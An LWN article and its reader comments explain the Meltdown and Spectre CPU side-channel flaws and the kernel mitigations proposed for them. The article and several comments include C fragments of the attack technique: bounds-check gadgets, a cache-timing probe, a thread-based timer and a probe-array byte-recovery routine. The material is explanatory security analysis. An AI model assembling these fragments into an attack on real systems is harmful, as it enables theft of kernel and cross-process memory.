
Notes from the Intelpocalypse


By Jonathan Corbet
January 4, 2018
Rumors of an undisclosed CPU security issue have been circulating since before LWN first covered the kernel page-table isolation patch set in November 2017. Now, finally, the information is out — and the problem is even worse than had been expected. Read on for a summary of these issues and what has to be done to respond to them in the kernel.

All three disclosed vulnerabilities take advantage of the CPU's speculative execution mechanism. In a simple view, a CPU is a deterministic machine executing a set of instructions in sequence in a predictable manner. Real-world CPUs are more complex, and that complexity has opened the door to some unpleasant attacks.

A CPU is typically working on the execution of multiple instructions at once, for performance reasons. Executing instructions in parallel allows the processor to keep more of its subunits busy at once, which speeds things up. But parallel execution is also driven by the slowness of access to main memory. A cache miss requiring a fetch from RAM can stall the execution of an instruction for hundreds of processor cycles, with a clear impact on performance. To minimize the amount of time it spends waiting for data, the CPU will, to the extent it can, execute instructions after the stalled one, essentially reordering the code in the program. That reordering is often invisible, but it occasionally leads to the sort of fun that caused Documentation/memory-barriers.txt to be written.

Out-of-order execution runs into a challenge whenever the code branches, though. The processor may not yet be able to tell which branch will be taken, so it doesn't know where to go to execute ahead of the stalled instruction(s). The answer here is "branch prediction". The processor will make a guess based on past experience with the branch in question and, possibly, explicit guidance from the code (the unlikely() directive used in kernel code, for example). Once the actual branch condition can be evaluated, the processor will determine whether it guessed right. If not, the "speculatively" executed instructions after the branch will be unwound, and everything will proceed as if they had never been run.
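For reference, the kernel's hint looks roughly like this (simplified from include/linux/compiler.h):

    /* Tell the compiler which way the branch usually goes, so the
       generated code (and the predictor's job) favors the common path. */
    #define unlikely(x)  __builtin_expect(!!(x), 0)

    if (unlikely(err))
        handle_error();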

A branch-prediction failure should really only lead to slower execution, with no visible side effects. That turns out to not be the case, though, leading to a set of severe information-disclosure vulnerabilities. In particular, speculative instruction execution can cause data to be loaded into the CPU memory cache; timing attacks can then be used to learn which instructions were executed. If speculative execution of kernel code can be controlled by an attacker, the contents of the cache can be used as a covert channel to get data out of the kernel.

Getting around boundary checks

Perhaps the nastiest of the vulnerabilities, in terms of the cost of defending against them, allows the circumvention of normal boundary checks in the kernel. Imagine kernel code that looks like this:

    if (offset < array1->length) {
        unsigned char value = array1->data[offset];
        unsigned long index = ((value & 1) * 0x100) + 0x200;
        if (index < array2->length) {   /* array2->length is < 0x300 */
            unsigned char value2 = array2->data[index];
        }
    }

If offset is greater than the length of array1, the reference into array1->data should never happen. But if array1->length is not cached, the processor will stall on the test. It may, while waiting, predict that offset is within bounds (since it almost always is) and execute forward far enough to at least begin the fetch of the value from array2. Once it's clear that offset is too large, all of that speculatively done work will be discarded.

Except that array2->data[index] will be present in the CPU cache. An exploit can fetch the data at both 0x200 and 0x300 and compare the timings. If one is far faster than the other, then the faster one was cached; if that is the data at 0x200, the inner branch was speculatively executed and, in particular, the lowest bit of value was not set. That leaks one bit of kernel memory under attacker control; a more sophisticated approach could, of course, obtain more than a lowest-order bit.
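What might such a timing probe look like? A rough sketch (x86-specific, using GCC/Clang intrinsics, and omitting the cache-priming setup a real exploit needs; none of this comes from the actual exploit code):

    #include <stdint.h>
    #include <x86intrin.h>   /* __rdtscp() */

    /* Return the latency, in cycles, of a single load; a "fast" result
       means the line was already cached, presumably by speculation. */
    static inline uint64_t probe_time(const volatile unsigned char *addr)
    {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        (void)*addr;                     /* the timed load */
        return __rdtscp(&aux) - start;
    }

Comparing probe_time(&array2->data[0x200]) against probe_time(&array2->data[0x300]) then reveals which line speculation pulled in.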

If a code pattern like the above exists in the kernel and offset is under user-space control, this kind of attack can be used to leak arbitrary data from the kernel to a user-space attacker. It would seem that such patterns exist, and that they can be used to read out kernel data at a relatively high rate. It is also possible to create the needed pattern with a BPF program — some types of which can be loaded and run without privilege. The attack is tricky to carry out, requires careful preparation of the CPU cache, and is processor-dependent, but it can be done. Intel, AMD, and ARM processors are all vulnerable (in varying degrees) to this attack.

There is no straightforward defense to this attack, and nothing has been merged to date. The only known technique, it would seem, is to prevent speculative execution of code within branches when the branch condition is under an attacker's control. That requires putting in a barrier after every test that is potentially vulnerable. Some preliminary patches have been posted to add a new API for sensitive pointer references:

    value = nospec_load(pointer, lower, upper);

This macro will return the value pointed to by pointer, but only if it falls within the given lower and upper bounds; otherwise zero is returned. There are a number of variants on this macro; see the documentation for the full set. This approach is problematic on a couple of counts: it hurts performance, and somebody has to find the vulnerable code patterns in the first place. Current vulnerabilities may be fixed, but there can be no doubt that new vulnerabilities of this type will be introduced on a regular basis.
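As a hedged illustration (the API was only a preliminary posting, so its final form may differ), the boundary-check example above might be rewritten along these lines:

    if (offset < array1->length) {
        /* Returns the element only if the pointer lies within
           [array1->data, array1->data + array1->length); a speculated
           out-of-bounds access sees zero instead of secret data. */
        unsigned char value = nospec_load(&array1->data[offset],
                                          array1->data,
                                          array1->data + array1->length);
        unsigned long index = ((value & 1) * 0x100) + 0x200;
        /* ... as before ... */
    }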

Messing with indirect jumps

The kernel uses indirect jumps (calling a function through a pointer, for example) frequently. Branch prediction for indirect jumps uses cached results in a separate buffer that only keys on 31 bits of the address of interest. The resulting aliasing can be exploited to poison this cache and cause speculative execution to jump to the wrong location. Once again, the CPU will figure out that it got things wrong and unwind the results of the bad jump, but that speculative execution will leave traces in the memory cache. This issue can be exploited to cause the speculative execution of arbitrary code that will, once again, allow the exfiltration of data from the kernel.
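For concreteness, the pattern at issue is just an ordinary call through a function pointer; this sketch is loosely modeled on kernel interfaces like file_operations, not taken from actual kernel code:

    #include <stddef.h>

    struct ops {
        long (*read)(void *file, char *buf, size_t count);
    };

    static long do_read(struct ops *ops, void *file, char *buf, size_t count)
    {
        /* An indirect call: the branch-target buffer predicts its
           destination from a truncated call-site address, which is
           what an attacker can poison. */
        return ops->read(file, buf, count);
    }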

One rather frightening aspect of this vulnerability is that an attacker running inside a virtualized guest can use it to leak data accessible to the hypervisor — all the data in the host system, in other words. That has all kinds of highly unpleasant implications for cloud providers. One can only hope that those providers have taken advantage of whatever early disclosure they got to update their systems.

There are two possible defenses in this case. One would be a microcode update from Intel that fixes the issue, for some processors at least. In the absence of this update, indirect calls must be replaced by a two-stage trampoline that will block further speculative execution. The performance cost of the trampoline will be notable, which is why Linus Torvalds has complained that the current patches seem to assume that the CPUs will never be fixed. There is a set of GCC patches forthcoming to add a flag (-mindirect-branch=thunk-extern) to automatically generate the trampolines in cases where that's necessary. As of this writing, no defenses have actually been merged into the mainline kernel.

Forcing direct cache loads

The final vulnerability runs entirely in user space, without the involvement of the kernel at all. Imagine a variant of the above code:

    if (slow_condition) {
        unsigned char value = kernel_data[offset];
        unsigned long index = ((value & 1) * 0x100) + 0x200;
        if (index < length) {
            unsigned char value2 = array[index];
        }
    }

Here, kernel_data is a kernel-space pointer that should be entirely inaccessible to a user-space program. The same speculative-execution issues, though, may cause the body of the outer if block (and possibly the inner block if the low bit of value is clear) to be executed on a speculative basis. By checking access timings, an attacker can determine the value of one bit of kernel_data[offset]. Of course, the attacker needs to find a useful kernel pointer in the first place, but a variant of this attack can be used to find the placement of the kernel in virtual memory.

The answer here is kernel page-table isolation, making the kernel-space data completely invisible to user space so that it cannot be used in speculative execution. This is the only one of the three issues that is addressed by page-table isolation; it alone imposes a performance cost of 5-30% or so. Intel and ARM processors seem to be vulnerable to this issue; AMD processors evidently are not.

The end result

What emerges is a picture of unintended processor functionality that can be exploited to leak arbitrary information from the kernel, and perhaps from other guests in a virtualized setting. If these vulnerabilities are already known to some attackers, they could have been using them to attack cloud providers for some time now. It seems fair to say that this is one of the most severe vulnerabilities to surface in some time.

The fact that it is based in hardware makes things significantly worse. We will all be paying the performance penalties associated with working around these problems for the indefinite future. For the owners of vast numbers of systems that cannot be updated, the consequences will be worse: they will remain vulnerable to a set of vulnerabilities with known exploits. This is not a happy time for the computing industry.

It is, to put it lightly, unlikely that this is the last vulnerability hiding within the processors at the heart of our systems. Like the Linux kernel, these processors are highly complex devices that are subject to constant change. And like the kernel, they probably have a number of unpleasant issues lurking within them. Given that, it's worthwhile to look at how these vulnerabilities were handled; there seems to be some unhappiness on that topic which might affect how future issues are disclosed. It's important to get this right, since we'll almost certainly be doing it again.

See also: the Meltdown and Spectre attacks page, which has a detailed and academic look at these vulnerabilities.

Index entries for this article
Kernel: Security/Meltdown and Spectre
Security: Hardware vulnerabilities
Security: Linux kernel
Security: Meltdown and Spectre



Notes from the Intelpocalypse

Posted Jan 4, 2018 0:53 UTC (Thu) by vbabka (subscriber, #91706) [Link]

Such a detailed and spot-on writeup within a few hours of disclosure. Great job, Jon!

Notes from the Intelpocalypse

Posted Jan 4, 2018 14:57 UTC (Thu) by rsidd (subscriber, #2582) [Link]

I'm awed at this. Jon is superhuman.

Notes from the Intelpocalypse

Posted Jan 10, 2018 1:28 UTC (Wed) by ThinkRob (guest, #64513) [Link]

One of the many examples of how our subs support a vanishingly rare resource nowadays: actual journalism.

Seriously, well done LWN!

Notes from the Intelpocalypse

Posted Jan 4, 2018 2:30 UTC (Thu) by excors (subscriber, #95769) [Link]

> Intel and ARM processors seem to be vulnerable to this issue; AMD processors evidently are not.

ARM's information at https://developer.arm.com/support/security-update says the Meltdown issue ("variant 3") only affects Cortex-A75 (which is very new - I'm not sure it's in any shipping devices yet). Some more common ones (A15/A57/A72) are affected by "variant 3a", where you speculatively read a supposedly-inaccessible system register instead of memory, which is a less serious problem since system registers don't contain as much sensitive information as memory. I think that means most Android phone users don't need to worry much about it.

(But it looks like all the out-of-order ARMs are vulnerable to Spectre.)

Notes from the Intelpocalypse

Posted Jan 4, 2018 3:15 UTC (Thu) by ariagolliver (subscriber, #85520) [Link]

Wouldn't all out-of-order chips be vulnerable to Spectre? I'd be interested to read how speculation and caching could coexist on the same chip without it being vulnerable to some kind of side channel.

Notes from the Intelpocalypse

Posted Jan 4, 2018 3:25 UTC (Thu) by nix (subscriber, #2304) [Link]

I think you'd have to leave enough cache empty to satisfy likely ongoing speculation, evict material read into the cache to satisfy speculation iff the speculation fails, and *not* evict anything merely to free up cache to satisfy speculations (i.e. evict at retirement time, to keep a bit of space free).

Definitely a major change from the way caches work internally now, but not in any way impossible.

Notes from the Intelpocalypse

Posted Jan 4, 2018 7:53 UTC (Thu) by kentonv (✭ supporter ✭, #92073) [Link]

As noted in the paper, cache effects are not the only side effect of speculative execution. Other effects, like the amount of time spent speculating, seem difficult to hide...

Notes from the Intelpocalypse

Posted Jan 4, 2018 11:36 UTC (Thu) by nix (subscriber, #2304) [Link]

I just babbled about possible high-res-timer-related mitigations here: <https://lwn.net/Articles/742867/>. All a bit painful (and with user-visible consequences if you actually *need* accurate high-res times many times a second) but a lot less painful than the reported KPTI slowdown, ISTM.

Notes from the Intelpocalypse

Posted Jan 4, 2018 19:40 UTC (Thu) by Cyberax (✭ supporter ✭, #52523) [Link]

It won't work, unless you also disable multi-threading totally. You can cobble up a high-resolution timer by having one thread do N writes to a buffer and the other thread observing a value at a fixed offset within this buffer.
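For illustration, a minimal sketch of such a counting-thread clock (POSIX threads and C11 atomics; all names are invented for the example):

    #include <pthread.h>
    #include <stdatomic.h>

    static atomic_ulong ticks;        /* the shared "clock" */

    static void *counter(void *arg)   /* spins, incrementing forever */
    {
        (void)arg;
        for (;;)
            atomic_fetch_add_explicit(&ticks, 1, memory_order_relaxed);
        return NULL;
    }

    static void start_clock(void)
    {
        pthread_t t;
        pthread_create(&t, NULL, counter, NULL);
    }

The attacker samples ticks before and after the load being timed; the difference is a high-resolution relative timestamp obtained without any OS timer.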

Notes from the Intelpocalypse

Posted Jan 4, 2018 20:19 UTC (Thu) by bronson (subscriber, #4806) [Link]

If you have enough time to perform the attack, it won't work period. Even if I'm only allowed a very low resolution timer, I can compensate by performing lots of operations and running some statistics.

(In addition to being extremely well known for crypto timing attacks, it's how LIGO can measure 1/1000th of the width of a proton.)
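As a sketch of that statistical amplification (do_probe() is a hypothetical stand-in for one complete prime+speculate+measure cycle):

    #include <time.h>

    /* Even a coarse clock resolves N repetitions of an operation;
       dividing by N recovers the per-iteration cost, so timing
       differences far below the clock's resolution survive. */
    static double avg_ns(void (*do_probe)(void), int n)
    {
        struct timespec a, b;
        clock_gettime(CLOCK_MONOTONIC, &a);
        for (int i = 0; i < n; i++)
            do_probe();
        clock_gettime(CLOCK_MONOTONIC, &b);
        return ((b.tv_sec - a.tv_sec) * 1e9 + (b.tv_nsec - a.tv_nsec)) / n;
    }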

Notes from the Intelpocalypse

Posted Jan 4, 2018 20:37 UTC (Thu) by nix (subscriber, #2304) [Link]

"Performing lots of operations and running some statistics" probably slows the attack from a 500KiB/s flood down to a trickle, though. It seems a useful amelioration, at least.

Notes from the Intelpocalypse

Posted Jan 4, 2018 21:44 UTC (Thu) by roc (subscriber, #30627) [Link]

But the multithreading approach Cyberax noted is a showstopper. Note that it also works with multiple single-threaded processes that share memory. It could even be made to work without shared memory, just with one process writing a counter to a file and another process reading it.

Even if you think you can fix all those (I don't see how), it's difficult to be confident people aren't going to come up with new ways to estimate time. And each mitigation you introduce degrades the user experience.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:55 UTC (Thu) by Cyberax (✭ supporter ✭, #52523) [Link]

Another one I've heard is to submit an asynchronous disk request and time its completion.

Notes from the Intelpocalypse

Posted Jan 5, 2018 17:26 UTC (Fri) by anselm (subscriber, #2796) [Link]

One important observation with covert channels is that in general, covert channels cannot be removed completely. Insisting that a system be 100% free of all conceivable covert channels is therefore not reasonable.

People doing security evaluations are usually satisfied when the covert channels that do inevitably exist provide such little bandwidth that they are, in practice, no longer useful to attackers.

Notes from the Intelpocalypse

Posted Jan 4, 2018 5:22 UTC (Thu) by jimzhong (subscriber, #112928) [Link]

I think one way is to redesign branch prediction so that when a misprediction occurs, in addition to flushing instructions in the mispredicted branch, the cache is also restored to the state before taking the branch. But this fix might be expensive.

Notes from the Intelpocalypse

Posted Jan 4, 2018 5:37 UTC (Thu) by sfeam (subscriber, #2841) [Link]

That might narrow the timing window but I don't think it would be sufficient to prevent the attack. The analysis of Spectre shows that hundreds of instructions may be executed speculatively before the misprediction is recognized, so snooping on the cache contents would still be possible during that interval.

Notes from the Intelpocalypse

Posted Jan 4, 2018 7:22 UTC (Thu) by Cyberax (✭ supporter ✭, #52523) [Link]

And so the ways to snoop on the cache contents should be curtailed.

Notes from the Intelpocalypse

Posted Jan 4, 2018 14:15 UTC (Thu) by droundy (subscriber, #4559) [Link]

Indeed, I wonder about the possibility of separate speculative caches. Sounds terribly expensive, though.

Notes from the Intelpocalypse

Posted Jan 4, 2018 21:50 UTC (Thu) by roc (subscriber, #30627) [Link]

The only reasonable and watertight way to do that that I can think of is to partition the cache by protection domain. So cache lines would have owners: the kernel, specific user-space processes, and even within processes you'd want separate cache lines for JS vs the browser. A cache lookup would have to find a line owned by the current protection domain; if it did not, that has to be treated as a miss, and you would only be allowed to evict cache lines owned by the current domain.

It would hurt performance but what else would really work?

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:28 UTC (Thu) by rahvin (guest, #16953) [Link]

That sounds like a fix that would destroy cache effectiveness; you'd probably also enable a DoS attack that causes the cache to be partitioned until there isn't any cache left and things start locking up.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:40 UTC (Thu) by roc (subscriber, #30627) [Link]

There are probably ways to avoid lockup. I agree the performance impact would be bad. But what else really works?

Notes from the Intelpocalypse

Posted Jan 5, 2018 1:46 UTC (Fri) by rahvin (guest, #16953) [Link]

And we all thought Heartbleed was the worst thing ever; it kinda pales in comparison to this.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:51 UTC (Thu) by sfeam (subscriber, #2841) [Link]

It's worse than you think. The use of the cache as a side channel was convenient for the proof-of-concept exploits but was not necessary. Mitigation that focuses on the cache rather than the speculative execution of invalid code is necessarily incomplete. The Spectre report notes: "potential countermeasures limited to the memory cache are likely to be insufficient, since there are other ways that speculative execution can leak information. For example, timing effects from memory bus contention, DRAM row address selection status, availability of virtual registers, ALU activity, [...] power and EM."

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:00 UTC (Thu) by roc (subscriber, #30627) [Link]

Yeah, I read the paper. Just addressing the cache question since it was raised.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:57 UTC (Thu) by Cyberax (✭ supporter ✭, #52523) [Link]

Switchable caches (by PCID), perhaps?

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:01 UTC (Thu) by roc (subscriber, #30627) [Link]

That's basically the same as partitioning the cache, isn't it?

Notes from the Intelpocalypse

Posted Jan 5, 2018 0:03 UTC (Fri) by excors (subscriber, #95769) [Link]

Rather than restricting each domain to a tiny partition of the cache (which sounds painful for L1), perhaps you could let each domain use the whole cache (like now) but flush it every time you switch domain.

Then you'd want to rearchitect software to minimise the amount of domain-switching. E.g. instead of a syscall accessing protected data from the same core as the application, it would just be a stub that sends a message to a dedicated kernel core. Neither core would have to flush their own cache, and they couldn't influence each other's cache. Obviously you'd have to get rid of cache coherence (I don't see how your proposal would be compatible with coherence either), and split shared L2/L3 caches into dynamically-adjustable per-domain partitions, and no hyperthreading, etc.

Then maybe someone will notice that DRAM chips remember the last row that was accessed, so a core can touch one of two rows and another core can detect which one responds faster, and leak information that way. Then we'll have to partition DRAM by domain too.

Eventually we might essentially have a network of tiny PCs, each with its own CPU and RAM and disk and dedicated to a single protection domain, completely isolated from each other except for an Ethernet link.

Hmm, I'm not sure that will be good enough either: Spectre gets code in one domain (e.g. the kernel) to leak data into cache that affects the timing of a memory read in another domain (e.g. userspace), but couldn't it work with a purely kernel-only cache, if you simply find an easily-timeable kernel call that performs the memory read for you? Then it doesn't matter how far removed the attacker is from the target.

Notes from the Intelpocalypse

Posted Jan 5, 2018 13:44 UTC (Fri) by welinder (guest, #4699) [Link]

Even that might not be enough. If any information based on speculation has left the CPU chip -- memory reads that reach the main memory -- then you might get caching effects there.

I don't see tagging every memory location with an owner as a viable option.

Notes from the Intelpocalypse

Posted Jan 4, 2018 9:46 UTC (Thu) by epa (subscriber, #39769) [Link]

In the third example I was surprised that the access through the kernel pointer didn't generate a memory protection fault. But then I remembered that it never really 'happened' because the if-condition is always false (but mispredicted as true). The issue is surely that speculative execution ignores the memory protection. The fix would be to limit speculative execution to memory that's definitely permitted (even if that means a few odd cases now get slower).

Notes from the Intelpocalypse

Posted Jan 4, 2018 11:08 UTC (Thu) by excors (subscriber, #95769) [Link]

I don't think it's fair to say it ignores the memory protection - it fetches the value (from L1$) and just predicts that there won't be a fault, carries on speculatively executing as if there wasn't a fault, and then eventually checks the memory protection and unwinds (most of) the CPU state when it realises it predicted wrong. The problem is that the CPU's behaviour during the speculative part is subtly observable, and so the fetched value is observable.

The Meltdown PoC puts the memory read itself inside a speculative execution path, but I assume that's not strictly needed - it just makes the attack quicker/easier since you don't need to deal with a real page fault handler (because the fault gets unwound by the outer level of speculation).

Apparently the protection bits are stored alongside the data in L1$, so it seems like it shouldn't be expensive for the CPU to check those bits simultaneously with fetching the value, and then it can immediately replace the value with 0 or pretend it was a cache miss or whatever, so that it doesn't continue executing with the protected value. (But maybe it's more complicated than that in reality.)

Notes from the Intelpocalypse

Posted Jan 4, 2018 11:27 UTC (Thu) by MarcB (subscriber, #101804) [Link]

The last paragraph is basically what seems to be the difference between Intel and AMD, and why AMD is not affected by Meltdown: AMD checks permissions - and aborts if they would be violated - before measurable side effects occur; Intel checks afterwards.

But this has no effect on Spectre, which is based on speculative execution without crossing security boundaries.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:56 UTC (Thu) by marcH (subscriber, #57642) [Link]

> But this has no effect on Spectre, which is based on speculative execution without crossing security boundaries.

I don't understand: array1->data[offset] is out of boundaries. If it were not then what information would be leaked?

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:18 UTC (Thu) by rahvin (guest, #16953) [Link]

That it was in boundary. The point is that you can find the boundaries, I believe. Once you know the boundaries, you can start extracting data beyond them a bit at a time; after a number of cycles you've extracted something potentially valuable, like login credentials or encryption keys.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:26 UTC (Thu) by marcH (subscriber, #57642) [Link]

I kept missing one of the main differences between Meltdown and Spectre: Spectre runs in kernel space, Meltdown doesn't. Sorry for the noise.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:52 UTC (Thu) by sfeam (subscriber, #2841) [Link]

Spectre is particularly nasty if the target code runs in kernel space, hence the concern about user-supplied BPF code. But that is a special case. The general case is that Spectre snoops information from any process you can persuade to execute the leaking code. The snooping is easiest if that is another thread in the same process (e.g. an un-sandboxed browser window). No kernel space is involved there.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:17 UTC (Thu) by samiam95124 (guest, #120873) [Link]

Sorry, that is just not true. You are mixing speculative and non-speculative execution.

Notes from the Intelpocalypse

Posted Jan 5, 2018 16:25 UTC (Fri) by MarcB (subscriber, #101804) [Link]

What do you mean?

My understanding of Meltdown is that it uses the limited speculative execution caused by classic pipelining+out-of-order execution (it does not use the advanced speculative execution that is used by Spectre). Or does it just use the reordering of stages, i.e. "read" before "check"?

It boldly accesses memory it is not allowed to access and then "defuses" the exception by forking beforehand and sacrificing the child process. Or it avoids exceptions by using TSX and rolling back. It then checks if a given address was loaded into cache or not by the forbidden access.

And apparently this does not work on AMD - and AMD claimed to never make speculative accesses to forbidden addresses - i.e. they must be checking earlier or never reorder "read" before "check".

However, I do not see, how AMD could do this with TSX; there allowing this forbidden access seems to be part of the spec. Or does Ryzen not have TSX?

Notes from the Intelpocalypse

Posted Jan 5, 2018 17:34 UTC (Fri) by foom (subscriber, #14868) [Link]

TSX isn't supposed to allow you to access memory you don't have permission to access, it just triggers a different response if you try – instead of a sigsegv, you get a transaction abort.

(Also, no, AMD doesn't implement it)

Notes from the Intelpocalypse

Posted Jan 6, 2018 14:58 UTC (Sat) by nix (subscriber, #2304) [Link]

> It boldly accesses memory it is not allowed to access and then "defuses" the exception by forking beforehand and sacrificing the child process. Or it avoids exceptions by using TSX and rolling back. It then checks if a given address was loaded into cache or not by the forbidden access.

Nope. It boldly accesses memory and then uses the value read from that memory to read one of a variety of bits of memory it shares with the attacker, but it does all of that *behind a check which will fail*, so the reads are only ever done speculatively, and no exception is raised. Unfortunately the cache-loading done by that read still happens, and the hot cache is easily detectable by having the attacker time its own reads of the possible locations. (With more than two locations, you can exfiltrate more than one bit at once, possibly much more.)

Needless to say, if you have a way to exfiltrate the data other than a shared memory region, you can use it: the basic attack (relying on side-effects of speculations bound to fail) is the same.
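As a sketch of that multi-location variant (mirroring the probe-array construction described in the published papers; names and helper signatures here are invented):

    #include <stdint.h>

    /* One cache line per possible byte value; the 4096-byte (page)
       stride keeps the hardware prefetcher from muddying the signal. */
    static unsigned char probe_array[256 * 4096];

    /* Runs only speculatively, behind a check bound to fail: */
    static void leak(unsigned char secret_byte)
    {
        (void)*(volatile unsigned char *)
            &probe_array[secret_byte * 4096];    /* caches one line */
    }

    /* Afterwards the attacker times all 256 lines; the single fast
       (cached) index is the value of the secret byte. */
    static int recover(uint64_t (*time_load)(const volatile unsigned char *))
    {
        int best = 0;
        uint64_t best_time = UINT64_MAX;
        for (int i = 0; i < 256; i++) {
            uint64_t t = time_load(&probe_array[i * 4096]);
            if (t < best_time) { best_time = t; best = i; }
        }
        return best;
    }

That exfiltrates a full byte per round instead of a single bit.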

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:15 UTC (Thu) by samiam95124 (guest, #120873) [Link]

It's not that speculative exec "ignores memory protection", but that you can't cause exceptions based on what might not even happen. Go down that road and you would be causing faults everywhere.

The key to speculative execution is that it has to cause no side effects that would not be there if the processor didn't speculatively execute at all. Obviously there is one the CPU designers didn't think of, which is access time. That's what makes this exploit a really, really clever one.

Notes from the Intelpocalypse

Posted Jan 5, 2018 6:52 UTC (Fri) by epa (subscriber, #39769) [Link]

Sure, it can't cause a memory exception based on something that might not happen -- but ideally it shouldn't speculate accesses to memory which isn't accessible. Currently, I think it is fair to say that speculative execution 'ignores' the memory protection, in this example at least. The accessibility of the memory doesn't have any impact on what speculative execution does.

I suggest that if practical, speculative execution should take memory protection into account, and if it gets to the point where an exception would be triggered, just stop speculating at that point and don't actually fetch the value from memory.

> The key to speculative execution is that it has to cause no side effects that would not be there if the processor didn't speculatively execute at all.

I think that is an impossible goal, at least if the purpose of speculation is to improve performance. The whole point of it is for the speedup side effects. So the effect of speculative execution will always be observable; what matters is to not speculatively execute (and make observable) operations which you would not be allowed to do in non-speculative execution.

Notes from the Intelpocalypse

Posted Jan 5, 2018 7:03 UTC (Fri) by Cyberax (✭ supporter ✭, #52523) [Link]

AMD checks permissions before speculatively executing stuff. But this doesn't protect against Spectre.

Notes from the Intelpocalypse

Posted Jan 10, 2018 11:35 UTC (Wed) by epa (subscriber, #39769) [Link]

You are right, I believe I was only talking about Meltdown, not Spectre.

The thought occurs that a processor could have two active permission modes: one for normal execution and one for speculation. So even though the processor is executing in kernel mode (Ring 0), speculative accesses still get the memory permissions associated with user space. So the transition from user to kernel space would be broken into two steps: first the processor switches to kernel mode but leaves speculative accesses unprivileged; later, once deep inside the kernel, an explicit instruction could enable speculative fetches to kernel memory too.

(That might still let you snoop on another userspace process, of course.)

Notes from the Intelpocalypse

Posted Jan 15, 2018 19:00 UTC (Mon) by ttonino (guest, #4073) [Link]

I'm afraid that all execution is speculative, but it is not rolled back afterwards.
Otherwise it would be easy to load cache lines with an extra bit 'speculative=1' and if non-speculative execution encountered such a line, regard it as invalid.
Sadly, that does not work: all execution is speculative, and most (?) of it is just not rolled back.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:10 UTC (Thu) by samiam95124 (guest, #120873) [Link]

I suspect the final hardware fix would be blinding the spec exec unit from unpermissioned pages. I.e., you can't cause a fault from a speculative execution from a non-permissioned page, because that would give a fault where none would actually occur. But the CPU knows that the memory accessed is not in the user ring. Without redesigning the entire spec unit, you blind the data fetch by replacing it with, say, 0s. Then the side effects are not useful.

I suspect with time we will see several hardware fixes, but obviously with brand new CPUs.

Notes from the Intelpocalypse

Posted Jan 5, 2018 11:01 UTC (Fri) by epa (subscriber, #39769) [Link]

Or indeed you could change the way memory protection works altogether such that any access to a forbidden address returns zero and sets a processor flag to be checked asynchronously. (Speculative access would not set the flag.) The kernel could then kill the process a short while later if the flag is set. This would obviously make things less robust by allowing processes to continue blithely past bad pointer accesses, at least for a short while.

I think your proposal of returning zeroes only for speculative loads and faulting on the normal ones is preferable, if it can be implemented efficiently.

Notes from the Intelpocalypse

Posted Jan 4, 2018 15:19 UTC (Thu) by jcm (subscriber, #18262) [Link]

To be vulnerable to branch predictor abuse, you need to be able to train the predictor. If you (correctly) index your predictor using all of the bits of the VA, as opposed to the low order bits, you remove the most obvious route of attack. It's great we can finally talk about these problems together!

Notes from the Intelpocalypse

Posted Jan 4, 2018 16:36 UTC (Thu) by ortalo (guest, #4654) [Link]

Could you elaborate? (More specifically, what is the 'VA' here?)

Notes from the Intelpocalypse

Posted Jan 4, 2018 18:12 UTC (Thu) by jcm (subscriber, #18262) [Link]

At some point. Let's give this all time to settle down :)

Notes from the Intelpocalypse

Posted Jan 4, 2018 21:51 UTC (Thu) by roc (subscriber, #30627) [Link]

VA = Virtual Address

Notes from the Intelpocalypse

Posted Jan 4, 2018 21:54 UTC (Thu) by roc (subscriber, #30627) [Link]

Seems like that would help user -> kernel attacks but not user -> user attacks.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:52 UTC (Thu) by jcm (subscriber, #18262) [Link]

Nah, it's VA+ASID/PCID. It's actually very simple to have a branch predictor that is safe against variant 2. You just need to have your index completely disambiguate against other live contexts. The only problem with this is that it's more bits to compare but, as compared to not having any branch prediction within one of the contexts, or flushing the predictor, I know which I prefer. I expect all of the vendors to make this relatively trivial fix in future silicon and then apply CONFIG_MARKETING to overhype it.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:02 UTC (Thu) by roc (subscriber, #30627) [Link]

That makes sense, although in my defense you did say "all the bits of the VA" :-).

Notes from the Intelpocalypse

Posted Jan 10, 2018 15:26 UTC (Wed) by anton (subscriber, #25547) [Link]

Normally branch predictors don't tag (and check) their entries at all, they just use a bunch of bits (possibly after mixing them in a non-cryptographic way) to index into the table and use whatever prediction they find there (no prediction is just as bad for performance as misprediction, so they don't bother checking). Having the ASID as tag would be enough to avoid getting the predictor primed by an attacking process (won't help against an attack from untrusted code within the same process (e.g., JavaScript code), though).

Other approaches for fixing the hardware without throwing out the baby with the bathwater could be to put any loaded cache lines in an enhanced version of the store buffer until speculation is resolved; and to (weakly) encrypt the address bits when accessing various shared hardware structures, combined with changing the secret frequently. I guess there are others, too.

more vulnerabilities to be found

Posted Jan 4, 2018 2:34 UTC (Thu) by jimzhong (subscriber, #112928) [Link]

Branch prediction, speculative execution, and caches are all in classic computer architecture textbooks. Whoever came up with these exploits is brilliant. I think people will find more vulnerabilities like these.

more vulnerabilities to be found

Posted Jan 4, 2018 15:21 UTC (Thu) by jcm (subscriber, #18262) [Link]

See page B-37 of both the current and previous editions of Computer Architecture, where it explicitly says you should perform the permission check during speculation. I've been keeping that reference ready to point folks at ;)

more vulnerabilities to be found

Posted Jan 4, 2018 15:45 UTC (Thu) by jimzhong (subscriber, #112928) [Link]

Checking permissions can prevent the Meltdown attack, which is specific to Intel processors. I doubt whether it can prevent Spectre.

more vulnerabilities to be found

Posted Jan 4, 2018 15:56 UTC (Thu) by jcm (subscriber, #18262) [Link]

Indeed, but as I said elsewhere in the thread, you can mitigate branch predictor abuse if you correctly index your predictor based upon the full address space (including ASID/PCID/etc.). The hardware fix for variant 2 isn't actually as bad as people claim.

more vulnerabilities to be found

Posted Jan 4, 2018 22:39 UTC (Thu) by roc (subscriber, #30627) [Link]

That's only part of the Spectre attack though.

